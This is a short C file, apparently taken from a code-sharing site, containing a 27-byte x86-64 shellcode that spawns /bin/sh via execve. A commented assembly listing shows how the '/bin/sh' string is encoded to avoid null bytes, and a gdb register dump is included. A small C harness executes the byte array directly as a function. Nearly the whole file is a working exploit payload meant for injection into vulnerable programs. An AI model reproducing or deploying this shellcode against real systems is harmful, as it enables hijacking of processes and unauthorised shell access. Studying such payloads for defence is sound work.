56 lines
No EOL
1.4 KiB
C
56 lines
No EOL
1.4 KiB
C
/*
|
|
* Execute /bin/sh - 27 bytes
|
|
* Dad` <3 baboon
|
|
;rdi 0x4005c4 0x4005c4
|
|
;rsi 0x7fffffffdf40 0x7fffffffdf40
|
|
;rdx 0x0 0x0
|
|
;gdb$ x/s $rdi
|
|
;0x4005c4: "/bin/sh"
|
|
;gdb$ x/s $rsi
|
|
;0x7fffffffdf40: "\304\005@"
|
|
;gdb$ x/32xb $rsi
|
|
;0x7fffffffdf40: 0xc4 0x05 0x40 0x00 0x00 0x00 0x00 0x00
|
|
;0x7fffffffdf48: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
|
|
;0x7fffffffdf50: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
|
|
;0x7fffffffdf58: 0x55 0xb4 0xa5 0xf7 0xff 0x7f 0x00 0x00
|
|
;
|
|
;=> 0x7ffff7aeff20 <execve>: mov eax,0x3b
|
|
; 0x7ffff7aeff25 <execve+5>: syscall
|
|
;
|
|
|
|
main:
|
|
;mov rbx, 0x68732f6e69622f2f
|
|
;mov rbx, 0x68732f6e69622fff
|
|
;shr rbx, 0x8
|
|
;mov rax, 0xdeadbeefcafe1dea
|
|
;mov rbx, 0xdeadbeefcafe1dea
|
|
;mov rcx, 0xdeadbeefcafe1dea
|
|
;mov rdx, 0xdeadbeefcafe1dea
|
|
xor eax, eax
|
|
mov rbx, 0xFF978CD091969DD1
|
|
neg rbx
|
|
push rbx
|
|
;mov rdi, rsp
|
|
push rsp
|
|
pop rdi
|
|
cdq
|
|
push rdx
|
|
push rdi
|
|
;mov rsi, rsp
|
|
push rsp
|
|
pop rsi
|
|
mov al, 0x3b
|
|
syscall
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
|
|
|
|
int main()
|
|
{
|
|
printf("len:%d bytes\n", strlen(code));
|
|
(*(void(*)()) code)();
|
|
return 0;
|
|
} |